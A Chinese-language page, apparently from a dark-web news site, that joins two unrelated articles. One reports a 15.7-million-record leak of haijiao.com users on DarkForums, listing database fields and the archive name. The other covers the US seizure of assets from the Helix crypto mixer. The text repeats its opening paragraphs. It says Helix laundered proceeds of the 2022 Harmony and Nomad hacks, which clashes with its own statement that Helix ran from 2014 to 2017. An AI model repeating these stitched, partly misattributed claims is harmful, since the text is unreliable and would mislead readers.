经本站(anwangxia.com)查询,网络上公开信息显示,海角社区在2022年曾发生过大规模用户数据泄露事件。截至目前,未见2025-2026年全新大规模泄露的可靠报道。据报道,2022年7月底,海角社区发生用户数据泄露事件,超过1300万用户数据泄露,泄露数据包括:用户名、手机号、邮箱、密码(MD5哈希)、IP地址等等。泄露原因可能是由于海角社区服务器配置错误或者其他安全漏洞,导致黑客可以直接连接数据库并导出所有用户数据。
“暗网下/AWX”建议海角社区用户:立即修改密码并更换邮箱、立刻检查使用相同密码的其他重要网站、警惕各类诈骗短信以及邮件联系。
近日,“暗网下/AWX”发现,知名中文成人网站海角社区发生一起大规模数据泄露事件,一名威胁行为者在DarkForums泄露了一个数据库,其中包含大约1570万条用户记录。
发布该数据库的黑客昵称是“Tanaka”,帖子名为“China – haijiao.com 15.7M User DB”。在帖子内,他介绍了数据库信息,贴上了样本数据,并给出了具体的下载地址。根据介绍,数据格式是Json格式,泄露时间是2022年,从样本分析,数据可能是从Elasticsearch导出,包含如下字段:
_id; _index; _score; avatar; cash_count; cert_professor; cert_professor_expire; cert_video; cert_video_expire; certified; certified_expire; comment_count; created_at; deleted_at; description; email; email_verified; famous; famous_weight; fans_count; favorite_user_count; forbidden_end_time; id; last_login_ip; last_login_time; nickname; parent_id; password; pay_password; phone; popularity; role; sex; status; tags; topic_count; updated_at; username; video_status; vip; vip_expires_time; voice_status
从字段看,泄露用户数据包括用户名、电子邮件地址、手机号码、密码(哈希加密)、最后登录IP与时间以及其他与帐户相关的详细信息,例如地点和兴趣。
访问下载地址,提示数据上传时间为2023-08-13 18:49:23,文件名是“15.7M-CN-haijiao.com-Chinese-Porn-Forum-UsersDB-json-2022.zip”,压缩包大小为1.47 GB,未压缩前是14.7 GB。
海角社区是一个中文成人网站,主要涉及成人视频、论坛及相关敏感内容,以泄露各种乱伦,通奸,强奸,偷拍等非自愿色情图片与视频为卖点。截至目前,该社区仍在正常运营,且用户活跃度较高。虽然是前期数据,但是数据量如此之大、免费开放下载使得这起泄露事件十分严重。“暗网下/AWX”提醒,网络犯罪分子可能会针对该数据定向钓鱼或者诈骗,请务必注意防范!
经本站(anwangxia.com)查询,网络上公开信息显示,海角社区在2022年曾发生过大规模用户数据泄露事件。截至目前,未见2025-2026年全新大规模泄露的可靠报道。据报道,2022年7月底,海角社区发生用户数据泄露事件,超过1300万用户数据泄露,泄露数据包括:用户名、手机号、邮箱、密码(MD5哈希)、IP地址等等。泄露原因可能是由于海角社区服务器配置错误或者其他安全漏洞,导致黑客可以直接连接数据库并导出所有用户数据。
“暗网下/AWX”建议海角社区用户:立即修改密码并更换邮箱、立刻检查使用相同密码的其他重要网站、警惕各类诈骗短信以及邮件联系。
美国司法部已没收了与臭名昭著的暗网混币服务平台Helix相关的超过4亿美元的加密货币、房地产和货币资产。在联邦法官于1月21日下达最终命令后,美国政府获得了相关资产的合法所有权。这项上周宣布的行动,标志着迄今为止打击利用加密货币洗钱的最大规模行动之一。
根据美国司法部发布的消息,Helix隐瞒了加密货币的来源和去向,在2014年至2017年间转移了超过3亿美元的非法资金。Helix是一个暗网加密货币混合器,用于洗钱来自在线毒品市场和其他犯罪活动的收益。该平台由Larry Dean Harmon运营,他于2021年8月承认犯有洗钱共谋罪。
根据“暗网下/AWX”的前期报道,2024年11月,他被判处三年监禁和三年监管释放,其资产被没收。1月21日,法官正式将这些资产的所有权判给政府,最终确认了司法部的诉求。
Helix在暗网洗钱网络中的角色 Helix是洗钱的关键工具,用于非法网络毒品交易。它将众多用户的加密货币混合在一起,使得追踪资金流向变得极其困难。法庭记录显示,Helix从2014年开始运营,处理了约354,468枚比特币(BTC)的交易——当时价值约3亿美元——其中大部分资金流经或者来自主要的暗网市场。Harmon从中抽取一定比例手续费作为其运营Helix的佣金和费用,从这些非法交易中牟利。
Harmon还将Helix与其建立的暗网搜索引擎Grams连接起来,直接与主要的暗网市场整合,使暗网市场能够轻松地自动转移比特币。调查人员通过Helix追踪到数千万美元的资金流向,这表明它对非法网络活动的重要性。
像Helix这样的暗网混币服务,在暗网市场上作为一种工具,通过汇集和重新分配资金来模糊加密货币的来源和去向,从而使交易更难追踪。暗网指的是互联网上未被标准搜索引擎收录的部分,通常需要通过Tor等工具访问以实现匿名性。
美国司法部、联邦调查局和国税局的官员强调了此次打击该平台行动中团队合作的重要性。美国政府还与伯利兹当局合作,展现了强有力的国际合作。
打击和制裁加密货币混合器的更广泛背景 Helix案是打击加密货币混合器这一更广泛行动的一个例证。美国财政部过去曾因TornadoCash协助数十亿美元的非法交易而对其进行制裁。然而,由于法律和政策方面的挑战,对TornadoCash的制裁已于2025年解除。
其他加密货币混合器,例如Blender,也因协助洗钱而受到制裁。例如,朝鲜支持的Lazarus Group就曾利用Blender转移了从Ronin Network窃取的超过2050万美元。
美国司法部记录显示,Helix帮助洗白了Lazarus Group超过4.55亿美元的资金、Harmony Bridge黑客事件中损失的9600万美元,以及Nomad黑客事件中损失的至少780万美元。
2023年,在与美国当局的合作下,德国联邦刑事警察局关闭了据称是暗网上最大的洗钱服务Chipmixer。调查人员从该加密货币混合器中查获了大约4400万欧元。
类似案例及对行业的影响 TRM Labs全球政策和政府事务主管Ari Redbord表示:“Helix就是一个专门为从暗网市场洗钱而构建的服务的例子,而不是一个后来被滥用的中立隐私工具,关闭它就等于把这个基础设施当作犯罪供应链的任何其他部分来对待。 ”
他说,司法部的行动感觉就像“拆除了一个专门的洗钱中心”,这样做“迫使不法分子放弃一个值得信赖的综合服务,转而走上不太直接、更容易受到攻击的途径”。
“这感觉就像打地鼠一样,但每一次打击都会通过切断熟悉的路线并将资金推向新的、更易追踪的渠道,给洗钱过程增加真正的阻力,因此即使活动发生转变,也会变得更慢、风险更大,”他补充道。
不仅是Helix,Samourai Wallet背后的团队也因帮助犯罪分子藏匿2.37亿美元的赃款而被判入狱,其首席技术官William Lonergan Hill被判处4年监禁,首席执行官Keonne Rodriguez被判处5年监禁,他们还被勒令放弃数百万美元的财产。
美国司法部此次查封行动表明,当局对加密货币混合器的监控力度空前加强。随着有人试图利用数字货币洗钱,世界各地的监管机构正在携手合作,共同保护金融体系。